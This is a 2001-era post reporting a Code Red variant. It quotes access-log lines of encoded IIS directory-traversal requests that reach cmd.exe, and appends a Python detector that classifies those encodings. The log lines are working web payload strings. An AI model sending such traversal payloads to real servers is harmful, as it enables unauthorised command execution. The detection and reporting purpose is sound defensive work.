New Variation of CodeRed

There is a new variation of the Code Red that is attempting to exploit every
variation of NT/2000 vulnerability... well not EVERY but all the usual
suspects including those opened up by codered2.

[18/Sep/2001:10:03:29 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
[18/Sep/2001:10:03:30 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
[18/Sep/2001:10:03:30 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
[18/Sep/2001:10:03:30 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
[18/Sep/2001:10:03:31 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311

Above is a sample of my access log (fortunately NO NT/IIS at my borders).
I've excluded the IP addresses of the attacker and BLACKHOLED them at my
Router to minimize the traffic. This is going to be a rough one!

E. Lee Ingalls III
Commercial Tool & Die Inc.
(p)616.785.8100 (f)616.785.8120
lee.ingalls@...
Fortitudine Vincimus: "by Endurance we conquer."
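
Added example, not part of the original post: Python detection logic that classifies the request targets from the log sample above by how the directory separator is hidden. The function name `classify`, the tag names, and the model of a decoder that skips continuation-byte validation are assumptions made for illustration.

```python
import re

# Request targets copied from the access-log sample in the post above.
SAMPLE_TARGETS = [
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
]

_PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
_C0_C1 = re.compile(rb"([\xc0\xc1])(.)", re.DOTALL)

def _lax_fold(match):
    # Assumption: model a decoder that does not check the 10xxxxxx continuation
    # bits, so C0 2F and C0 AF both fold to '/', C1 1C and C1 9C both to '\'.
    lead, trail = match.group(1)[0], match.group(2)[0]
    return bytes([(lead & 0x1F) << 6 | (trail & 0x3F)])

def classify(target, max_rounds=4):
    """Return sorted tags for the path part of a request target."""
    data = target.split("?", 1)[0].encode("latin-1")
    tags, rounds = set(), 0
    # Percent-decode until the path stops changing; a normal URL needs one pass.
    while rounds < max_rounds:
        decoded = _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    if rounds > 1:
        tags.add("double-encoding")
    # 0xC0 and 0xC1 can never start a valid UTF-8 sequence.
    folded = _C0_C1.sub(_lax_fold, data)
    if folded != data:
        tags.add("overlong-utf8")
    # Treat '\' like '/' (Windows path rules) and look for a ".." segment.
    if b".." in folded.replace(b"\\", b"/").split(b"/"):
        tags.add("traversal")
    return sorted(tags)

if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        print(classify(t), t)
```

The first four requests come out tagged as overlong UTF-8 and the last four as double-encoded; a server or filter that decodes once and validates UTF-8 strictly sees no path separator in any of them, which is why the check has to run on the fully normalized path.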